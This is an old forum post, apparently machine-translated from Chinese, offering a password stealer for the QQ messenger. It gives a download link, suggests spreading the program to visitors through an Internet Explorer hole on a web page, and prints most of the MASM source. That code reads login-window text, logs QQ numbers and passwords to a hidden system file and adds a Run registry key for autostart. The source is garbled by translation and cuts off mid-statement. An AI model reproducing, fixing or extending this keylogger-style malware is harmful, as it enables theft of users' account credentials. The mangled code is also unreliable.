Use assembly language to pirate QQ password program (2005-04-07 18:40)
You can learn from this program to use some special feature programs for assembly ... Locking.8u8.com/hack/asmqq.rar This is a record that I have used in 98 environments a day. QQ password, only less than 7KB programming language is Win32 compilation, I use Masm8.0 classifier to deal with the latest QQ2003, QQ1230 version .... Now online, do you have a problem? Update is not used .... I have to write one, because this stuff is only a few KB written, so you can put it in the web page to use IE's cave to make people who have seen the web page .. Of course You have to change the program because it doesn't have the function of sending an email. Document description: Qqlog.txt C: WindowsSystem32 directory, the password is put this QQPlus.exe main program, put it in the system directory when using, program write registration Table Self-start QQPlus.asm Source File QQ.RC Resource File FindStr.vbs I use the script that does not allow repeated writes to verify that the algorithm Str.ASM verifies whether there is a known string in a small module readme. TXT This also wants to explain :) Clarified: D: Masm32bin> Type B.BAT ML / C / Coff msg.asm link / subsystem: windows msg.obj qq.res Czy in 03.06.15 .386 .Model flat, stdcall Option/include/include/include/user32.inc includelib ../lib/User32.lib include ../include/kernel32.inc includelib ../lib/kernel32.lib includDe ../include/Advapi32.inc includelib ../lib/Advapi32.lib _PROCVAR2 typedef proto: dword,: dword PROCVAR2 typedef ptr _PROCVAR2 .data szcaption db hello asm, 0 sztext db hehe, 0 szqqtitle db, 0 sztext1 db cant! Find, 0 TX DB 40 DU P (0), 0 Pass DB 16 DUP (0), 0 QQNO DB 40 DUP (0), 0 log DB C: WindowsSystem32QQLOG.TXT, 0 SZFORMAT DB% S% S, 0DH, 0AH, 0 Regpath DB SoftwareMicrosoftWindowsCurrentVersionRun, 0 Keyname DB QQPlus, 0 Exename DB QQPlus.exe, 0 HKEY DD? Allnum Dd? @SZBuffer DB 60 DUP (0), 0 Canwrite DB 0; ------------------------------------------------------------------------------------------------ --------------- Is there a repeated record of the Find DB The same username password has existed in the file, 0 logall DB 1024 DUP (0), 0 @ HFILE1 DD? P DD 0; start The match value is set to 1, and the time matching is changed to 0 k DD 0; how many of the same characters have been found in logAll; save the first character in logall in LogAll in LogAll? J DD 0; record how many strings found in Logall to base DD 0; record logAll's address LENSTR DD 0; record the length of the matching string LEN DD 0; record file length @ SZBuffer1 DB 10 dup (0), 0 SZFORMAT1 DB% D% S, 0;
------------------------------- .const Szregister DB RegisterServiceProcessa, 0 Kerdll DB kernel32.dll, 0 .data? ? hInstance dd hWinMain dd RegisterServiceProcessA PROCVAR2 hDllInstance dd .code _isin proc invoke CreateFile, offset log, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_SYSTEM, NULL; OPEN_ALWAYS:??? exist open, create mov @ hFile1, eax invoke does not exist GetFileSize, @ hFile1, NULL; get file length invoke ReadFile, @ hFile1, offset logall, eax, offset allnum, NULL invoke CloseHandle, @ hFile1 invoke lstrlen, addr logall; to obtain the total length of the string mov esi, offset len mov [esi], Eax; INVOKE LSTRLEN, OFFSET @szbuffer in the len variable; get the username password to remember MOV ESI, Offset Lenstr Mov [ESI], EST LENSTR MOV [ESI], Eax; Invoke Wsprintf, Addr @ Szbuffer, Offset Szformat, Lenstr; Invoke Messagebox, Null, Offset Logall, Offset @ szbuffer, 1; * is written from the file from the file, below is comparing the Mov ESI, Offset Logall Mov Edi, Offset @szbuffer Xor EAX, EAX XOR EBX, EBX XOR ECX, ECX XOR EDX, EDX @@ bg: Movzx Eax, Byte Ptr [ESI]; Logall Movzx EBX, Byte Ptr [EDI]; @szbuffer Mov ECX, LEN .IF J> ECX JMP @@ EXIT .Endif .IF EA x == EBX .IF P == 0; find one of the first letters of Hello, the same number of INC P; P is set to 1 MOV EDX, OFFSET J MOV ECX, [EDX] MOV Q, ECX; Q .endif inc edi inc esi inc j inc k mov ecx, lenstr .if k == ecx pushad; invoke wsprintf, addr @ szBuffer1, offset szFormat1, k, offset logall; invoke MessageBox, NULL, offset @ szBuffer1, offset find, 1 POPAD; call the function EAX value to change the register Inc canwrite; writeable marking is set to 1 jmp @@ EXIXIF .ELSE .IF P == 1 MOV ECX, Q Mov J, ECX INC J MOVZX EAX , Byte PTR [ESI] Add ESI, J MOV EDI, OFFSET @SzBuffer Dec P; P Reset to 0 MOV K, 0 .Else Inc J INC ESI .Endif .Endif JMP @@ bg @@ EXIT: RET _ISIN ENDP _SAVEPASS Proc; Username Password Record in global variables Local @Hfile: Hfile local @
lpOpenbuf: OFSTRUCT invoke wsprintf, addr @ szBuffer, offset szFormat, offset qqno, offset pass; invoke MessageBox, NULL, offset @ szBuffer, offset szcaption, 1 mov qqno, NULL mov pass, NULL invoke _isin .if canwrite == 0 invoke CreateFile , offset log, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_SYSTEM, NULL; OPEN_ALWAYS: existence is open, it does not exist create mov @ hFile, eax invoke SetFilePointer, @ hFile, 0, NULL, FILE_END invoke SetEndOfFile, @ hFile; file pointer into the end of the file invoke lstrlen, addr @szBuffer invoke _lwrite, @ hFile, addr @ szBuffer, eax .else dec canwrite; reduction numerals .endif invoke CloseHandle, @ hFile; clear the current record password to prevent repeated recording ret _SavePass endp _Findzi proc _hzi invoke GetWindowLong, _hzi, GWL_STYLE .if eax == 50012080h; QQ number recorded invoke SendMessage, _hzi, WM_GETTEXTLENGTH, 0, 0 inc eax push eax invoke SendMessage, _hzi, WM_GETTEXT, eax, offset tx; invoke MessageBox, NULL, offset tx, Offset Szcaption, 1; Mov ESI, Offset TX; MOV EDI, Offset QQNO; MyCopyStr0:; MOV Al, Byte PTR [ESI]; CMP Al, 0; JZ MyCopyStr1; MOV [EDI], Al; Inc ESI; Inc EDI; JMP MyCopyStr1: POP ECX .IF ECX> 5; Length greater than 4, QQNO! = TX MOV EDI, OFFSET QQNO MOV ESI, OFFSET TX XOR EDX, EDX .While Edx
TX MOV EDI, OFFSET Pass Mov ESI, Offset TX XOR Edx, EDX .While Edx
